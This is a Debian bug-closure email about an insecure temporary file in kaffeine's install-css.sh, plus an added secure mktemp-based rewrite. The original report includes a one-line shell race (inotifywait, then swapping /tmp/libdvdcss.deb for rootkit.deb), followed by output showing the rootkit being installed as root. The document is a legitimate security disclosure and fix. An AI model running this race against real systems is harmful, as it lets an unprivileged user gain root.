Your message dated Mon, 09 Aug 2010 15:30:48 +0200
with message-id <2flfwynoquv....@login2.uio.no>
and subject line Re: install-css.sh: insecure temporary file /tmp/libdvdcss.deb
has caused the Debian Bug report #554772,
regarding install-css.sh: insecure temporary file /tmp/libdvdcss.deb
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
554772: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=554772
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: kaffeine
Version: 0.8.7-1
Severity: normal
Tags: security

Steps to reproduce:
1) Malice starts the following command in the background with the
   privileges of her normal user account:

sh -c 'echo > /tmp/libdvdcss.deb; inotifywait /tmp/libdvdcss.deb; rm /tmp/libdvdcss.deb; mv /tmp/rootkit.deb /tmp/libdvdcss.deb' &

2) Malice calls the local administrator Trent and complains that she
   can't watch DVDs.

3) Guided by /usr/share/doc/kaffeine/README.Debian Trent runs

sudo bash /usr/share/doc/kaffeine/install-css.sh

Expected results:
3) Code to decrypt DVDs is installed.

Actual results:
3) Due to insecure use of temporary files in install-css.sh Malice's
   rootkit.deb is installed:

$ sudo bash /usr/share/doc/kaffeine/install-css.sh
--2009-11-06 13:54:46--  http://www.dtek.chalmers.se/groups/dvd/deb/libdvdcss2_1.2.5-1_amd64.deb
Resolving www.dtek.chalmers.se... 129.16.30.198
Connecting to www.dtek.chalmers.se|129.16.30.198|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 26176 (26K) [text/plain]
Saving to: `/tmp/libdvdcss.deb'

100%[=====================================>] 26,176      --.-K/s   in 0.03s

2009-11-06 13:54:47 (799 KB/s) - `/tmp/libdvdcss.deb' saved [26176/26176]

(Reading database ... 176859 files and directories currently installed.)
Unpacking replacement rootkit ...
Setting up rootkit (0.1-1) ...
Processing triggers for man-db ...


-- System Information:
Debian Release: 5.0.3
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.26-2-xen-amd64 (SMP w/4 CPU cores)
Locale: LANG=C, LC_CTYPE=fi_FI (charmap=ISO-8859-1)
Shell: /bin/sh linked to /bin/bash

Versions of packages kaffeine depends on:
ii  hdparm           8.9-3                   tune hard disk parameters for high
ii  kdelibs4c2a      4:3.5.10.dfsg.1-0lenny2 core libraries and binaries for al
ii  libc6            2.7-18                  GNU C Library: Shared libraries
ii  libcdparanoia0   3.10.2+debian-5         audio extraction tool for sampling
ii  libgcc1          1:4.3.2-1.1             GCC support library
ii  libogg0          1.1.3-4                 Ogg Bitstream Library
ii  libqt3-mt        3:3.3.8b-5              Qt GUI Library (Threaded runtime v
ii  libstdc++6       4.3.2-1.1               The GNU Standard C++ Library v3
ii  libvorbis0a      1.2.0.dfsg-3.1          The Vorbis General Audio Compressi
ii  libvorbisenc2    1.2.0.dfsg-3.1          The Vorbis General Audio Compressi
ii  libx11-6         2:1.1.5-2               X11 client-side library
ii  libxcb1          1.1-1.2                 X C Binding
ii  libxext6         2:1.0.4-1               X11 miscellaneous extension librar
ii  libxine1         1.1.14-6                the xine video/media player librar
ii  libxine1-ffmpeg  1.1.14-6                MPEG-related plugins for libxine1
ii  libxine1-x       1.1.14-6                X desktop video output plugins for
ii  libxinerama1     2:1.0.3-2               X11 Xinerama extension library
ii  libxtst6         2:1.0.3-1               X11 Testing -- Resource extension 

kaffeine recommends no packages.

kaffeine suggests no packages.

-- no debconf information



--- End Message ---
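The report above turns on install-css.sh downloading to a fixed, predictable name in the world-writable /tmp and then installing from it as root. The following is an added example written for this page, not kaffeine's script: the same download-and-install step done through a private mktemp directory, with the vulnerable shape shown as a comment for contrast. The URL is hypothetical and the fetch/install commands are constructed stand-ins (in a real script they would wrap `wget -O` and `dpkg -i`) so that it runs offline.

```shell
#!/bin/sh
# Added example (not the kaffeine script): the download-and-install step of a
# helper like install-css.sh, written so that a pre-created, replaced or linked
# /tmp/libdvdcss.deb cannot be handed to root.
set -eu

# Hypothetical URL; the real one appears in the report's wget output.
URL="http://example.invalid/libdvdcss.deb"

# Vulnerable shape, shown only for contrast:
#   wget -O /tmp/libdvdcss.deb "$URL" && dpkg -i /tmp/libdvdcss.deb
# A fixed name in a world-writable directory can be pre-created by any user,
# swapped between download and install (as the report's inotifywait loop does),
# or made a symlink so that the download lands wherever that user chooses.

# $1 = URL, $2 = fetch command (url, destination), $3 = install command (file).
# In a real script $2 would wrap "wget -O" and $3 would be "dpkg -i".
fetch_and_install_safely() {
    url=$1 fetcher=$2 installer=$3
    # mktemp -d creates an unpredictable directory with mode 0700, so no other
    # unprivileged user can pre-create, observe or replace files inside it.
    workdir=$(mktemp -d) || return 1
    deb="$workdir/libdvdcss.deb"
    status=1
    # Only install a regular file (not a symlink) that we own; anything else
    # means the download did not produce what we expect.
    if "$fetcher" "$url" "$deb" \
        && [ -f "$deb" ] && [ ! -L "$deb" ] && [ -O "$deb" ]; then
        "$installer" "$deb" && status=0
    fi
    rm -rf "$workdir"        # clean up on every path, success or failure
    return "$status"
}

# Constructed stand-ins so the example runs offline: the fetcher writes a few
# bytes instead of downloading; the installer records what it was given.
stub_fetch() { printf 'constructed package bytes\n' > "$2"; }
stub_fetch_symlink() { ln -s /etc/hostname "$2"; }   # simulates a bad download
stub_install() {
    STUB_INSTALLED_FROM=$1
    STUB_INSTALLED_BYTES=$(cat "$1")
}

fetch_and_install_safely "$URL" stub_fetch stub_install \
    && echo "installed from private path: $STUB_INSTALLED_FROM"
```

The installed path is never the shared /tmp/libdvdcss.deb name, and a download that yields a symlink instead of a regular file is refused before anything is installed.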
--- Begin Message ---
Version: 1.0-1

I had a look in version 1.0-1 in testing, and
/usr/share/doc/kaffeine/install-css.sh no longer exists in the package.
Because of this, I believe this bug can be closed.

Did not find anything about its removal in the Debian changelog, so I
do not know in which version it was taken away.

Happy hacking,
-- 
Petter Reinholdtsen


--- End Message ---
_______________________________________________
pkg-kde-extras mailing list
pkg-kde-extras@lists.alioth.debian.org
http://lists.alioth.debian.org/mailman/listinfo/pkg-kde-extras